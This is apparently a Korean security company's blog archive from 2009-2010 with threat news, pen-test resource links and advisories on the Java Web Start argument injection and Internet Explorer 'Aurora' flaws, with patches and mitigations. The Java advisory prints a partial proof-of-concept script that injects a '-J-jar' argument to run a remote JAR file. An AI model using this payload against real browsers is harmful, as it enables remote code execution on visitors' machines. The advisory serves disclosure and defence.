SHODAN - Computer Search Engine

보안 소식/주간 이슈 2010. 10. 19. 10:32 Posted by 알 수 없는 사용자
컴퓨터 검색 엔진을 아시나요?
기존 검색엔진처럼..검색어에 대한 관련 웹페이지를 찾아주는 것이 아니라, 검색어와 관련된 실제 대상 시스템(개인 PC, NAS, 서버 등)을 찾아주는 군요! 그래서 일명 "Hacker Search Engine"으로도 불리기도 한답니다...ㅎㅎ;

url) www.shodanhq.com

일례로, 구글에서 "scada"로 검색을 하면, 스카다 시스템과 관련된 웹 페이지들을 찾아줍니다. (소개 페이지, 설명 문서 등)


하지만, 이 검색엔진에서 "scada"로 검색하면..실제 스카다 시스템이 링크됩니다.


※ 서버 관리자는 자신이 관리하고 있는 서버가 검색엔진에 노출되고 있는지를 확인하고 적절한 대응체계를 구축해야 할 것입니다.

Useful sites for Pen-Test

그외 2010. 7. 14. 14:13 Posted by 알 수 없는 사용자

모의해킹 시 유용한 사이트 몇 곳을 소개합니다.

1. 플랫폼별 취약점 정리 사이트
본 사이트는 공개된 취약점을 Apple, Debian, MS 등의 플랫폼 별로 카테고리를 정리해 놓은 곳입니다.
특정 플랫폼의 취약점 또는 최신 취약점 업데이트 현황을 살펴보기 좋겠네요..^^

URL) http://vul.hackerjournals.com/


2. Python tools for penetration testers
파이썬으로 만들어진 각종 모의해킹 툴 모음 사이트입니다.
Network, Debugging and reverse engineering, Fuzzing, Web 등의 카테고리로 나뉘어져 있어, 테스트 용도에 맞는 툴을 찾을 때 유용할 것 같습니다. ^^

URL) http://dirk-loss.de/python-tools.htm

The Java Web Start Argument Injection Vulnerability 

취약점 보안 권고안

By. Dear.TOM (bdr@a3sc.co.kr)


Ⅰ. 취약점 개요

취약점

The Java Web Start Argument Injection Vulnerability

최초 발표일

2010년 4월

현재상태(패치여부)

패치됨

구성요소

Java Web Start

보안 영향

원격 코드 실행

위험도

높음



1. 요약
“The Java Web Start Argument Injection Vulnerability” 취약점은 JDT(Java Deployment Toolkit) 플러그인의 launch() 메소드 파라미터에 전달되는 입력 값의 유효성에 대한 검증이 미흡하여 발생하는 것으로, 해당 취약점은 2010년 4월 9일 Tavis Ormany에 의해 최초로 발표되었으며, Oracle Sun 社 에서는 4월 20일 공식 긴급 패치를 발표하였습니다.

2. 대상 시스템
다음은 Oracle Sun 社에서 해당 취약점에 취약한 버전을 공개한 목록입니다.

Java SE
   • JDK and JRE 6 for Windows, Solaris, and Linux      

Java for Business
   • JDK and JRE 6 for Windows, Solaris and Linux




Ⅱ. 취약점 세부 분석

1. 취약점 내용
해당 취약점은 JDT(Java Deployment Toolkit) 플러그인의 launch() 메소드의 파라미터에 전달되는 입력 값의 유효성에 대한 검증이 미흡하여 발생합니다.

JWS(Java Web Start)는 .jnlp(Java Network Launching Protocol)을 이용하여 전달받은 URL로부터 자바 어플리케이션을 다운로드 받아서 VM(Virtual Machin)에서 실행시키는 역할을 합니다. 이때, ActiveX control 과 NPAPI Plugin에서 제공하는 launch() 메소드를 통해 전달되는 URL의 유효성 검증이 미흡하여, 원격에서 악의적인 프로그램을 실행 시킬 수 있습니다.

2. 공격 분석
* 본 연구 문서는 신규 취약점 또는 보안 기술 우회 기법에 관한 문서로써 악용될 우려가 있는 상세 공격 코드 및 내용을 제한 합니다.

해당 취약점을 이용하여 제작된 악성 웹 페이지에 일반 사용자가 접근하면, 공격자가 의도한 임의의 프로그램을 실행 할 수 있습니다.

다음은 해당 취약점을 이용한 테스트 사이트의 웹 페이지 코드 입니다. 단, 해당 취약점을 최로로 밝힌 Tavis Ormany에 의해 테스트 용도로 구축되어 악의적인 공격을 수행하지는 않습니다.

<html>
        ...생략...

        // -J 옵션을 이용하여 매개변수로 전달하는 임의의 JAR 파일 실행 가능
        var u = "http: -J-jar -J\\\\lock.cmpxchg8b.com\\calc.jar none";

        if (window.navigator.appName == "Microsoft Internet Explorer") {
            var o = document.createElement("OBJECT");

            // IE 용 JDT ActiveX 플러그인 'deploytk.dll'의 클래스ID
            o.classid = "clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA";

            // JDT 플러그인의 launch()를 실행하여, 변수 u에 저장되어 있는 실행 경로를 
            // Java Web Start(javaws.exe)의 인자로 전달
            o.launch(u);
 
         ...생략...
</html>



다음은 해당 취약점을 이용한 웹 페이지 방문 결과, 윈도우 기본 계산기 프로그램이 실행되는 것을 확인하는 화면입니다.
 

3. 위험 분석

공격자는 “The Java Web Start Argument Injection” 취약점을 이용하여 원격지에서 임의의 (악성)코드 실행이 가능합니다. 이미 해외에서는 해당 취약점을 이용한 악성코드 유포 사례가 발견되었고, 공개 취약점 공격 도구에도 해당 취약점을 공격하는 기능이 추가 되어 있어, 취약한 버전을 사용할 경우 공격 당할 위험이 크다고 볼 수 있으므로, Java 관련 프로그램 혹은 플러그인을 사용하는 사용자는 최신 버전(JRE 6 update 20 이상의 버전)으로 업데이트 하시기 바랍니다.

4. 패치 분석
2010년 4월 20일 이루어진 긴급 보안 패치(Java SE 6 update 20)에서는 코드 기반 파라미터가 없는 Java Network Launch Protocol(JNLP) File을 더이상  동작  하지않도록 수정이 되었다고 밝히고 있습니다.


Ⅲ. 해결 방안

1. Oracle Sun 社 에서 제공하는 공식 패치 적용 - Java 6 Updatae 20
  URL) http://www.oracle.com/technology/deploy/security/alerts/alert-cve-2010-0886.html


Ⅳ. 참고자료

[1] [Full-disclosure] Java Deployment Toolkit Performs Insufficient Validation of Parameters
  URL) http://lists.grok.org.uk/pipermail/full-disclosure/2010-April/074036.html
[2] Java Deployment Toolkit Test Page
  URL) http://lock.cmpxchg8b.com/bb5eafbc6c6e67e11c4afc88b4e1dd22/testcase.html
[3] Java SE 6 Update 20 Release Notes
  URL) http://java.sun.com/javase/6/webnotes/6u20.html
[4] Security Alert for CVE-2010-0886 and CVE-2010-0887 Released
  URL) http://blogs.oracle.com/security/2010/04/security_alert_for_cve-2010-08.html
[5] JAVA Web Start Arbitrary command-line injection - "-XXaltjvm" arbitrary dll loading
  URL) http://reversemode.com/index.php?option=com_content&task=view&id=67&Itemid=1
[6] Java exploit launches local Windows applications
  URL) http://www.h-online.com/security/news/item/Java-exploit-launches-local-Windows-applications-974652.html
[7] Java zero-day flaw under active attack
  URL) http://blogs.zdnet.com/security/?p=6161
[8] The Java Web Start Argument Injection Vulnerability
  URL) http://blog.metasploit.com/2010/04/java-web-start-argument-injection.html

 

※ 현재 ㈜에이쓰리시큐리티에서 테스트 및 분석 중에 있으며, 이 문서는 계속 업데이트될 것입니다. 본 문서는 보안취약점으로 인한 피해를 최소화하는 데 도움이 되고자 작성되었으나, 본 문서에 포함된 대응방안의 유효성이나 기타 예상치 못한 시스템의 오작동 발생에 대하여서는 ㈜에이쓰리시큐리티에서는 일체의 책임을 지지 아니합니다.


Microsoft Internet Explorer "Aurora" Memory Corruption

취약점 보안 권고안

By. bdr@a3sc.co.kr
(A.K.A Dear.Tom)


Ⅰ. 취약점 개요

취약점

Microsoft Internet Explorer "Aurora" Memory Corruption

최초 발표일

2010 1

현재상태(패치여부)

unpached (1월 23일 패치 예정)

구성요소

Windows Internet Explorer

보안 영향

원격 코드 실행

위험도

높음



1. 요약
“Aurora”는 MS Windows Internet Explorer에서 비 정상적인 메모리 참조로 인하여 원격코드가 실행되는 취약점으로 2010년 1월 초 구글, 야후 등의 해외 기업의 공격 사례에 이용되었다는 사실을 통해 알려지기 시작했습니다. 해당 취약점의 공격코드는 현재 인터넷 검색으로 쉽게 획득할 수 있고, 공개되어 있는 취약점 공격 툴로 공격이 가능하므로 취약한 버전을 이용하는 분들에 대한 주의가 요구됩니다. 단, MS의 공식 패치는 2010년 1월 23일 공개 될 예정입니다.

2. 대상 시스템
다음은 MS에서 해당 취약점에 취약한 버전을 공개한 목록입니다.

Microsoft Windows 2000 Service Pack 4
Windows XP Service Pack 2 and Windows XP Service Pack 3
Windows XP Professional x64 Edition Service Pack 2
Windows Server 2003 Service Pack 2
Windows Server 2003 x64 Edition Service Pack 2
Windows Server 2003 with SP2 for Itanium-based Systems
Windows Vista, Windows Vista Service Pack 1, and Windows Vista Service Pack 2
Windows Vista x64 Edition, Windows Vista x64 Edition Service Pack 1, and Windows Vista x64 Edition Service Pack 2
Windows Server 2008 for 32-bit Systems and Windows Server 2008 for 32-bit Systems Service Pack 2
Windows Server 2008 for x64-based Systems and Windows Server 2008 for x64-based Systems Service pack 2
Windows Server 2008 for Itanium-based Systems and Windows Server 2008 for Itanium-based Systems Service Pack 2
Windows 7
Windows 7 for x64-based Systems
Windows Server 2008 R2 for x64-based Systems
Windows Server 2008 R2 for Itanium-based Systems
Internet Explorer 6 Service Pack 1 on Microsoft Windows 2000 Service Pack 4
Internet Explorer 6 for Windows XP Service Pack 2, Windows XP Service Pack 3, and Windows XP Professional x64 Edition Service Pack 2
Internet Explorer 6 for Windows Server 2003 Service Pack 2, Windows Server 2003 with SP2 for Itanium-based Systems, and Windows Server 2003 x64 Edition Service Pack 2
Internet Explorer 7 for Windows XP Service Pack 2 and Windows XP Service Pack 3, and Windows XP Professional x64 Edition Service Pack 2
Internet Explorer 7 for Windows Server 2003 Service Pack 2, Windows Server 2003 with SP2 for Itanium-based Systems, and Windows Server 2003 x64 Edition Service Pack 2
Internet Explorer 7 in Windows Vista, Windows Vista Service Pack 1, Windows Vista Service Pack 2, Windows Vista x64 Edition, Windows Vista x64 Edition Service Pack 1, and Windows Vista x64 Edition Service Pack 2
Internet Explorer 7 in Windows Server 2008 for 32-bit Systems and Windows Server 2008 for 32-bit Systems Service Pack 2
Internet Explorer 7 in Windows Server 2008 for Itanium-based Systems and Windows Server 2008 for Itanium-based Systems Service Pack 2
Internet Explorer 7 in Windows Server 2008 for x64-based Systems and Windows Server 2008 for x64-based Systems Service Pack 2
Internet Explorer 8 for Windows XP Service Pack 2, Windows XP Service Pack 3, and Windows XP Professional x64 Edition Service Pack 2
Internet Explorer 8 for Windows Server 2003 Service Pack 2, and Windows Server 2003 x64 Edition Service Pack 2
Internet Explorer 8 in Windows Vista, Windows Vista Service Pack 1, Windows Vista Service Pack 2, Windows Vista x64 Edition, Windows Vista x64 Edition Service Pack 1, and Windows Vista x64 Edition Service Pack 2
Internet Explorer 8 in Windows Server 2008 for 32-bit Systems and Windows Server 2008 for 32-bit Systems Service Pack 2
Internet Explorer 8 in Windows Server 2008 for x64-based Systems and Windows Server 2008 for x64-based Systems Service Pack 2
Internet Explorer 8 in Windows 7 for 32-bit Systems
Internet Explorer 8 in Windows 7 for x64-based Systems
Internet Explorer 8 in Windows Server 2008 R2 for x64-based Systems
Internet Explorer 8 in Windows Server 2008 R2 for Itanium-based Systems



Ⅱ. 취약점 세부 분석

1. 취약점 내용
이 취약점은 mshtml.dll 에서 CElement::GetDocPtr 메서드(method)가 잘못된 메모리를 참조하여 발생하며, 그 공격원리는 다음과 같습니다.

해당 공격코드는 "document.CreateEventObject()"를 이용하여, 이미지를 불러오거나 링크를 클릭하여 이벤트가 활성화 된 객체를 복사합니다. 그리고 "document.getElementById()"를 사용하여 활성화된 이벤트 공간을 참조한 다음, 어떤 임의의 문자열을 지정하여 그 개체를 파괴합니다. 이렇게 복사된 이벤트 객체는 유효하지는 않지만, 여전히 해당 메모리 공간으로 접근 할 수 있다는 점을 이용한 취약점입니다.

2. 공격 분석
다음은 “Aurora” 공격코드 중 쉘코드를 실행시키기 위한 Heap-spray, 이벤트 객체 복사 및 삭제 등을 하는 코드 부분입니다.

 

다음은 공격코드에서 nop slide에 해당하는 값을 임시로 수정하여 프로그램 흐름을 확인하는 화면입니다. 메모리는 nop slide(“BBBBBBBB”)로 가득 채워지고, 이로인해 EIP는 잘못된 메모리 주소 “BBBBBBBB”를 참조하고 있음을 확인 할 수 있습니다.


다음은 mshtml.dll 에서 비정상적인 메모리 주소로 접근하는 코드 영역(GetDocPtr())을 확인하는 화면입니다.


다음은 해당 취약점을 이용하여 타인의 PC를 장악하는 화면입니다.


3. 위험 분석

MS의 공식 패치가 이루어지지 않은 현재, 해당 취약점의 공격코드는 인터넷 검색으로 쉽게 획득할 수 있고, 공개되어 있는 취약점 공격 툴로 공격이 가능하므로 취약한 버전을 이용하는 사용자 대부분이 위험에 노출되어 있어, 적절한 대책을 적용하지 않은 사용자는 공격자에게 장악당할 수 있습니다.


Ⅲ. 해결 방안

1. DEP 활성화 패치 설치
  URL) http://download.microsoft.com/download/C/A/D/CAD9DFDF-AF35-4712-B876-B2EEA708495C/MicrosoftFixit50285.msi
2. IE 8로 업데이트(DEP 활성화 여부 확인)
3. IE의 보안 수준 강화

  설정) IE 도구 메뉴 -> 인터넷 옵션 -> 보안 탭 -> 사용자 지정 수준 -> “Active Scripting” 항목 ‘확인’ 혹은 ‘사용안함’으로 변경
  주의) 일부 사이트가 올바르게 작동하지 않을 수 있음.
4. 공식 패치 적용(1월 23일 발표 예정)
  URL) http://blogs.technet.com/koalra/archive/2010/01/21/s2010-1.aspx


Ⅳ. 참고자료

[1] Understanding DEP as a mitigation technology part 1 & 2
  URL) http://blogs.technet.com/srd/archive/2009/06/12/understanding-dep-as-a-mitigation-technology-part-1.aspx
  URL) http://blogs.technet.com/srd/archive/2009/06/12/understanding-dep-as-a-mitigation-technology-part-2.aspx
[2] 'Aurora' Exploit Retooled To Bypass Internet Explorer's DEP Security
  URL) http://www.darkreading.com/security/vulnerabilities/showArticle.jhtml?articleID=222301436&cid=RSSfeed_DR_News
[3] Operation “Aurora” Hit Google, Others
  URL) http://siblog.mcafee.com/cto/operation-%e2%80%9caurora%e2%80%9d-hit-google-others/
[4] Microsoft Security Advisory (979352)
  URL) http://www.microsoft.com/technet/security/advisory/979352.mspx
[5] Aurora Exploit 최초 공개
  URL) http://wepawet.iseclab.org/view.php?hash=1aea206aa64ebeabb07237f1e2230d0f&type=js
[6] Microsoft New Internet Explorer 0-day Vulnerability and Targeted Attacks
  URL) http://securitylabs.websense.com/content/Blogs/3530.aspx
[7] The Problem With innerHTML
  URL) http://www.julienlecomte.net/blog/2007/12/38/
 

※ 현재 ㈜에이쓰리시큐리티에서 테스트 및 분석 중에 있으며, 이 문서는 계속 업데이트될 것입니다. 본 문서는 보안취약점으로 인한 피해를 최소화하는 데 도움이 되고자 작성되었으나, 본 문서에 포함된 대응방안의 유효성이나 기타 예상치 못한 시스템의 오작동 발생에 대하여서는 ㈜에이쓰리시큐리티에서는 일체의 책임을 지지 아니합니다.

Internet Explore Zero-Day 피해 주의

보안 소식/주간 이슈 2009. 12. 2. 20:53 Posted by 알 수 없는 사용자

얼마전 IE 6, 7을 대상으로 하는 Exploit이 공개되어, 사용자들의 주의가 요구됩니다.

해당 취약점은 document.getElementsByTagName() method에 의해서 발생되는 취약점입니다.
HTML viewer인 mshtml.dll 에 영향을 미쳐서 브라우저 핸들이 크래쉬(서비스 거부)가 되는 취약점 입니다.

다음은 해당 취약점을 간략히 정리한 내용입니다.

 ▒ 대상: Microsoft Internet Explore 6, 7 (IE 8 제외)
 ▒ 특징: style 관련 태그에서의 취약점 발견
 ▒ 영향: 브라우저 핸들이 크래쉬되어 브라우저 멈춤 등의 현상이 일어날 수 있고, 공격자의 악성코드가 실행될 수 있음.

다음은 해당 취약점의 대응방안을 정리한 내용입니다. (12월 2일 현재까지, MS 공식 패치가 발표되지 않음.)
 ▒ IE8 사용
 ▒ Anti-Virus 제품 설치
 ▒ 출처가 불분명하거나 신뢰할 수 없는 사이트에 대한 방문 자제
 ▒ 보안업데이트가 발표되기 전까지 JavaScript를 사용하지 않도록 설정
     ([Internet Explorer > 도구 > 보안 > 인터넷 > 사용자 지정 수준]에서 "Active 스크립팅"을 "사용 안 함"으로 설정)

다음은 참고자료 및 사이트를 정리한 내용입니다.
 (1) http://www.symantec.com/connect/blogs/zero-day-internet-explorer-exploit-published
 (2) http://www.microsoft.com/technet/security/advisory/977981.mspx
 (3) http://www.krcert.or.kr/secureNoticeView.do?num=371&seq=-1

웹쉘 탐지 프로그램(Whistl) 보급 안내

보안 소식/주간 이슈 2009. 8. 13. 19:43 Posted by 알 수 없는 사용자

운영하는 서버에 웹쉘이 업로드 된다면 어떻게 될까요? 그 서버는 공격자에게 완전히 장악당하고 말것입니다. 이처럼 악의적인 웹쉘을 탐지할 수 있는 유용한 프로그램이 있어 소개해 드립니다.

다음은 "인터넷 침해사고 대응 지원센터"에 게시되어 있는 소개내용입니다.

    가. 세부 내용
           최근 공격자들이 국내 웹 서버를 해킹하여 웹쉘을 업로드한 후 악성코드 유포 및 개인정보 탈취 사례가 지속적으로 발생
           하고 있습니다. 이에, 한국인터넷진흥원에서는 공격자에 의해 생성된 웹쉘을 손쉽게 탐지하고 대응하기 위하여 "웹쉘 탐
           지 프로그램(Whistl)"를 개발하여 보급합니다.

          사용을 희망하는 회사(기관)에서는 사용 신청서를 작성하셔서 전자우편으로 첨부하여 신청하시기 바랍니다. 프로그램은
          신청서에 작성한 전자우편으로 첨부하여 보내드리며, 신청하신 날짜로 부터 2~3일 정도 소요될 수 있습니다.

          ○ Whistl 사용신청서 다운로드
          ○ Whistl 소개 및 FAQ
          ○ 문의 및 기술 지원(Tel : 02-405-5617, EMAIL : whistl@krcert.or.kr )

          ※ Whistl 프로그램은 공격자가 웹 서버를 해킹 한 후 생성한 웹쉘 파일을 서버 관리자들이 쉽게 탐지 할 수 있도록 패턴
              과 
인터페이스를 제공하는 프로그램입니다.
          ※ 또한 Whistl은 홈페이지의 보안 강화용으로 사용할 수 없습니다. 웹서버 해킹을 예방하기 위해서는 웹 전용 보안장비
              를 
운영하시고 취약점 여부를 점검하셔야 합니다.

    나. 참고 자료
         (1) http://www.krcert.or.kr/noticeView.do?num=298


※ 현재 ㈜에이쓰리시큐리티에서 테스트 및 분석 중에 있으며, 연구 문서는 추후 업데이트될 것입니다.

최신 주간 동향 (2009년 7월 5주차)

보안 소식/주간 이슈 2009. 8. 3. 18:23 Posted by 알 수 없는 사용자

1. 이란 네티즌, 조직적으로 사이버 공격 참여
     이란 네티즌이 대선 결과와 이란 정부의 언론 통제에 대항하는 사이버 공격이 확대되고 있습니다. 이란 대통령 홈페이지를 비롯, 친-이란 정부 웹사이트들이 접속 불능 상태에 빠졌습니다. 이번 공격은 DoS 툴을 이용한 공격, iFrame 로딩 스크립트, 웹 페이지 새로고침용 툴 등을 사용했습니다. 다수의 사람들이 해당 웹 페이지를 대상으로 새로고침을 함으로써, DDoS 공격의 효과를 발휘할 수 있습니다. 얼마전 온나라를 시끄럽게 만들었던 DDoS 공격의 여파가 아직 남아있는 만큼, 보안 관련 종사자들의 지속적인 관심과 세심한 주의가 요구됩니다.

    가. 세부 내용
            다음은 실제 공격에 사용되었던 "Page Rebooter"를 이용한 DoS 공격 예시입니다.

다음은 www.pagereboot.com로 접속하여, 대상사이트와 공격주기를 입력하는 화면입니다.

[그림1] 대상 및 공격주기 설정

다음은 공격 시도 시 열리는 페이지 화면입니다.
[그림2] 공격 시작

다음은 생성된 페이지의 자동 새로고침 javascript 코드를 확인하는 화면입니다.
[그림3] 소스코드 확인


    나. 관련링크
            (1) http://www.pagereboot.com/ie/
            (2) http://blogs.zdnet.com/security/?p=3613



2. 동유럽 ATM에서 데이터 스니핑 트로이 발견
     길거리에서 흔히 발견할 수 있는 작은 은행, ATM기를 해킹할 수 있다면? 더 이상 영화에서만 보던 가상의 시나리오가 아닙니다. 실제로 지난 18개월동안 동유럽국가의 현금 자동지급기에 트로이목마를 심어놓고, 사용자들의 데이터 및 현금을 인출해 간 범인이 붙잡혔습니다. 이 멀웨어를 발견한 스파이더랩에 의하면, 윈도우즈 XP기반의 다양한 벤더들의 ATM이 대상이라고 합니다. 자세한 내용 및 관련 보고서는 관련링크를 참조하시기 바랍니다.

    가. 관련링크
(1) http://www.theregister.co.uk/2009/06/03/atm_trojans/
            (2) http://regmedia.co.uk/2009/06/03/trust_wave_atm_report.pdf


3. 블랙햇, SMS 관련 취약점 발표
     지난달 미국에서 개최된 블랙햇 컨퍼런스에서 다양한 이슈들이 거론되었고, 그 중에서 SMS 관련 취약점도 포함되어 있습니다. 컨퍼런스에서 발표된 툴은 아이폰 뿐만 아니라, 어떤 모바일폰도 SMS를 사용한 공격 취약점을 테스트할 수 있다고 합니다. SMS의 진화로 종전의 텍스트 메시지 전송 뿐만 아니라, 그래픽, 동영상, 사운드 등을 지원할 수 있어 공격자들의 관심이 되고 있습니다. 이런 현실을 비추어 볼때, 앞으로 모바일 폰 또한, 공격의 위험으로부터 안전하지 않다는 것을 알 수 있기때문에 관련 업계 종사자의 노력과 함께, 일반 사용자들의 모바일 폰 사용에도 주의가 요구됩니다.

    가. 관련링크
(1) http://www.blackhat.com/html/bh-usa-09/bh-usa-09-archives.html
            (2) http://www.theregister.co.uk/2009/06/03/atm_trojans/
            (3) http://regmedia.co.uk/2009/06/03/trust_wave_atm_report.pdf


4. 블랙햇, 스마트그리드 관련 취약점 발표
     차세대 친환경 전력시스템으로 추앙받으며, 미국 내에서는 이미 해당 시스템을 도입하고 있습니다. 스마트 그리드란, 기존 전력망에 IT 기술을 접목하여 전력공급자와 소비자간의 실시간 정보 교환을 통해 에너지 효율을 최적화하는 차세대 전력망입니다. 하지만 에너지 효율 등의 장점이 있는 반면, 중앙에서 모든 전력 시스템을 통제하게 됨으로써 단 하나의 시스템에 존재하는 버그로 모든 시스템을 장악할 수 있다는 문제가 발생할 수 있습니다. 그리고 이와 관련된 취약점에 대한 발표가 블랙햇 컨퍼런스에서 있었습니다. 자세한 내용은 관련링크를 참조하시기 바랍니다.

    가. 관련링크
(1) http://www.blackhat.com/html/bh-usa-09/bh-usa-09-archives.html
            (2) http://www.theregister.co.uk/2009/06/12/smart_grid_security_risks/


5. MPEG2 0DAY 취약점
     최근 중국에서는 MPEG2와 관련한 버그가 이슈가 되고 있습니다. 지난 7월 초, 베이징에서는 적색경보가 울릴만큼 이 취약점을 이용한 공격의 영향이 컸다고 합니다. 이 취약점은 일반적인 웹 브라우저를 대상으로 한 것과 유사한 형태를 지니지만, 기존과는 다르게 악성코드가 포함된 비디오 파일이 필요없어 사용하기가 훨씬 쉽다는 특징이 있습니다. 또한, 거의 모든 최신 윈도우즈 시스템에서 이 취약점이 발견되었다고 하니, 보안 관계자들의 조속한 조치가 이루어져야 할 것입니다. 자세한 내용은 아래 관련링크를 참조하시기 바랍니다.

    가. 관련링크
(1) http://car.wj8.net/2009/07/microsoft-mpeg-2-video-leaked-0day.html
            (2) http://it.rising.com.cn/new2008/Anti_Virus/NewsInfo/2009-07-08/1247020333d53636.shtml

최신 주간 동향 (2009년 7월 4주차)

보안 소식/주간 이슈 2009. 7. 27. 13:51 Posted by 알 수 없는 사용자

1. 신종플루 바이러스 확산
     최근들어 실세계에서의 이슈사항을 이용한 컴퓨터 바이러스가 기승을 부리고 있습니다. 현재 전세계인들의 관심이 집중된 신종플루(인플루엔자A, H1N1) 또한 예외가 아닙니다. 이 신종 바이러스는 이메일에 첨부된 워드파일을 여는 순간 악성 바이러스에 감염됩니다. 이 악성파일은 키로거 기능을 수행하기 때문에 개인정보 유출 및 원격조작의 위험에 노출될 수 있습니다. 이처럼 사람들의 관심사항을 이용하여 악성바이러스가 유포되고 있는 만큼 개인 사용자들은 신뢰되는 메일이나 홈페이지가 아닐 경우 클릭에 좀 더 신중을 기해야 합니다. 바이러스에 대한 세부사항은 아래내용을 참조해 주시기 바랍니다.

    가. 세부 내용
    - 감연된 DOC 파일: Novel H1N1 Flu Situation Update.doc
    - 감염된 DOC 파일을 열면, 다음과 같은 악성 파일들이 설치 및 실행 된다고 합니다.

 %windir%\Temp\Novel H1N1 Flu Situation Update.doc
 %windir%\Temp\doc.exe
 %windir%\Temp\make.exe
 %windir%\system32\UsrClassEx.exe
 %windir%\system32\UsrClassEx.exe.reg 

    
    나. 관련링크
            (1) http://www.f-secure.com/weblog/archives/00001734.html
            (2) http://www.securitywatch.co.uk/2009/07/22/h1n1-flu-situation-update-spreads-malware/



2. Adobe Flash vulnerability affects Flash Player and other Adobe products
     어도비의 플래쉬 플레이어와 관련하여 최신 취약점이 발표되었습니다. 해당 취약점은 플래쉬 기능을 포함하는 모든 어도비 제품에 영향을 미치므로 사용자의 주의가 요구됩니다. 

    가. 세부 내용
     이 취약점은 어도비 플래쉬 버젼 9.0.159.0, 10.0.22.87, 그리고 9.x, 10.x 초기버전에 영향을 미칩니다. Adobe Reader9, Acrobat 9, 그리고 다른 어도비사의 제품들은 플래쉬 플레이 기능을 제공하는지 여부에 따라 다릅니다. 2009년 7월 22일, 플래쉬 9.0.159.0을 발표하면서 어도비 플래쉬 9.0.155.0을 포함한 어도비 리더 9.1.2버젼의 취약 가능성이 제기되었습니다.
 
이 취약점을 해결하기 위해서는
어도비사의 권고사항 APSA09-03(http://www.adobe.com/support/security/
advisories/
apsa09-03.html
)과 아래 내용을 참고하길 바랍니다.

  • 웹 브라우저의 플래쉬 기능을 끈다.
  • 어도비 리더9의 플래쉬 및 3D, 멀티미디어 제공 기능을 끈다.
다음의 파일들을 삭제하거나 이름을 바꾼다. (windows)
"%ProgramFiles%\Adobe\Reader 9.0\Reader\authplay.dll"
"%ProgramFiles%\Adobe\Reader 9.0\Reader\rt3d.dll"

다음의 파일들을 삭제하거나 이름을 바꾼다. (os x)
"/Applications/Adobe Reader 9/Adobe Reader.app/Contents/Frameworks/AuthPlayLib.bundle"
"/Applications/Adobe Reader 9/Adobe Reader.app/Contents/Frameworks/Adobe3D.framework"

다음의 파일들을 삭제하거나 이름을 바꾼다. (GNU/Linux)
"/opt/Adobe/Reader9/Reader/intellinux/lib/libauthplay.so"
"/opt/Adobe/Reader9/Reader/intellinux/lib/librt3d.so"
  • 플래쉬를 삭제한다.
  • MS Windows에서 DEP(Data Execution Prevention)를 설정한다.


    나. 관련링크
(1) http://www.kb.cert.org/vuls/id/259425
            (2) http://www.symantec.com/business/security_response/writeup.jsp?docid=2009-072209-2512-99&tabid=2

최신 주간 동향 (2009년 7월 3주차)

보안 소식/주간 이슈 2009. 7. 20. 18:37 Posted by 알 수 없는 사용자


1. MS09-029 - addresses a vulnerability in Microsoft Windows
     최근 MS 관련 취약점들이 많이 발표되고 있습니다. 그 중에서 CVE-2009-0231 과 CVE-2009-0232 관련 취약점 내용은 다음과 같습니다. 

CVE-2009-0231 과 CVE-2009-0232는 임베디드 오픈타입 폰트엔진에서 원격 코드 실행이 가능한 취약점이 있습니다.
▶ 영향
    - 대상: Windows Server 2008 server core installation을 제외한 거의 모든 버젼에서 영향을 받습니다.
    - 내용: 성공적으로 이 취약점을 익스플로잇한 공격자는 원격으로 해당 시스템을 완벽하게 컨트롤할 수 있게 됩니다. 그런 후
              프로그램을 설치하고, 데이터를 보고, 변경하고, 지우고, 사용자 권한을 가지고 있는 새로운 계정을 만들 수도 있습니
              다. 시스템에서 더 적은 권한을 가지게 설정되어 있는 사용자는 관리자 사용자 권한으로 운영되는 사용자보다 효과 적
              을 수
가 있을 수 있습니다.

         (1) http://www.microsoft.com/technet/security/Bulletin/MS09-029.mspx




2. Critical JavaScript vulnerability in Firefox 3.5
     최근 모질라의 웹 브라우저인 파이어폭스에서 심각한 취약점들이 발견되고 있습니다. 그 중에서 지난 주에 발표된 JIT 자바스크립트 컴파일러 관련 취약점은 현재(7월 14일 기준)까지 패치가 발표되지 않았으니 사용자분들의 주의가 필요합니다. 자세한 내용은 다음과 같습니다.

▶ 영향
    - 대상: Mozilla Firefox 3.5
    - 내용: 이 취약점은 익스플로잇 코드를 포함한 웹페이지를 일반 사용자가 보았을 때, 공격자 공격이 성공 할 수 있습니다.
 
이 취약점을 막기위해선 임시방편으로 다음과 같은 조치를 취해야 합니다.


              1. 브라우저의 주소창에 about:config 로 들어간다.
              2. 설정 메뉴에 있는 Filter box에서 jit 항목을 찾는다.
              3. javascript.options.jit.content를 더블클릭 해서 False로 설정한다.

이러한 조치를 취하게 되면, 자바스크립트의 실행 속도가 느려질 수 있기 때문에 패치를 하기 전까지만 임시로 이 방법을 사용하기를 권합니다. 패치 이후에는 다시 위의 설정값을 true로 돌려놓습니다.
  
    가. 관련 링크
         (1)
http://blog.mozilla.com/security/2009/07/14/critical-javascript-vulnerability-in-firefox-35/
         (2) http://secunia.com/advisories/35798



3. 오프라인으로 확장되는 악성 코드
     악성코드가 유포되는 경로가 변하고 있습니다. 그동안은 악성코드가 유포 및 실행이 이메일, 인터넷 게시판등의 온라인상에서 이루어졌지만 이제는 오프라인에서마저 악성코드의 위협으로부터 안전하지가 않다고 합니다. 우리가 일상생활에서 받기 쉬운 우편, 고지서 등의 오프라인 문서에 공격자의 악성코드 유포 사이트 주소를 기재하여, 일반 사용자의 접속을 유도한다고 합니다. 이제 부터는 온라인, 오프라인을 가리지 않고 접속 URL에 대한 주의가 필요할 것입니다.

다음은 오프라인 문서로 유도된 악성코드가 포함된 사이트에 접속한 화면입니다.

    
    가. 관련 링크
         (1) http://groups.google.com/group/bugtruck/browse_thread/thread/39c1e9e762d4f617?hl=ko




4. Linux 2.6.30+/SELinux/RHEL5 Test Kernel Local Root Exploit 0day

     리눅스 관련 최신 취약점에 대한 익스플로잇이 발표되었습니다. 자세한 내용은 아래 링크를 참조하시기 바랍니다.

    가. 관련 링크
         (1) http://www.milw0rm.com/exploits/9191



5. Mozilla Firefox 3.5 (Font tags) Remote Heap Spray Exploit
     모질라 파이어폭스 관련 최신 취약점에 대한 익스플로잇이 발표되었습니다. 자세한 내용은 아래 링크를 참조하시기 바랍니다.

    가. 관련 링크
         (1) http://www.milw0rm.com/exploits/9181

최신 주간 동향 (2009년 6월 4주차)

보안 소식/주간 이슈 2009. 6. 22. 12:59 Posted by 알 수 없는 사용자


1. Netgear DG632 라우터 인증 우회 취약점
